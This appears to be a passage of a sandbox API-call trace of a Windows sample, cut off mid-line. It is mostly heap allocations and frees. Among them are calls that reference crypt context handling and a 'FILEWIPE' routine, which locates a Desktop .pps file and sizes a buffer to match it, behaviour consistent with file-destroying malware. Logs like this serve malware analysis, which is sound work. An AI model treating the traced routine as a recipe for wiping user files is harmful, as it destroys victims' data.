RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.698] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.698] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.698] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0158.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.698] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0158.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0158.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.700] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.700] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.700] FreeLibrary (hLibModule=0x74f20000) returned 1 [0158.700] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.700] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.700] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.701] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.702] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0158.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0158.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.705] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0158.706] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0158.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x6bc54d10, ftLastWriteTime.dwHighDateTime=0x1d5de75, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 0x90af58 [0158.707] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0158.707] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0158.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0158.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0158.708] CharLowerBuffW (in: lpsz="byte[63293]", cchLength=0xb | out: lpsz="byte[63293]") returned 0xb [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.709] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.709] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0158.709] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.709] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0158.709] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0158.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0158.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.709] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.710] FreeLibrary (hLibModule=0x75c90000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.711] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.711] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0158.712] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.712] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.713] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.713] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.713] HeapFree (in: 